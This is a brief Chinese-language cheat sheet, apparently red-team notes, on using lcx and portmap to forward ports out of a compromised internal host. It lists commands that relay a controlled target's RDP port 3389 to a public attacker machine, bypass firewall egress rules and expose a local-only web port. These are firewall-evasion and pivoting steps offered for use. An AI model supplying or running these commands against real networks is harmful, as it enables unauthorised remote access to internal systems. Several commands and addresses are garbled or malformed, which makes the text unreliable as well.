端口轉發工具windows:lcx linux:portmap
轉發端口:lcx.exe -slave 公網ip 端口 内網ip 端口
監聽端口:lcx.exe -listen 轉發端口(未使用的)
映射端口:lcx.exe -tran 映射端口号 目标ip 目标端口
注:如果端口被綁定了服務的話,需要進行端口複用
情況一:目标ip,某端口不能出網,可以将該端口映射到防火牆允許出網的端口上
lcx.exe 不能出網的端口 目标ip 可以出網的端口
情況二:
開啟端口監聽
lcx.exe 1234 12345 1234端口再次轉發到12345端口
lcx.exe -slave 公網ip 端口 被控目标ip 端口
lcx -slave 1.1.1.1 1234 127.0.0.1 3389
外網攻擊機連接配接本地的 12345端口 然後mstsc 127.0.0.1:12345
情況三:内網主機不能通路外網,但是可以通路同網段的内網機器,同時80端口隻能本地通路,但是8080端口對外開放。
1、lcx.exe -tran 8080 127.0.0.1:80
2、lcx -slave 192.168.56.1:4444 192.168.56.101:8080
3、lcx -listen 4444 1234
4、用公網的機器連接配接192.168.56::1234的端口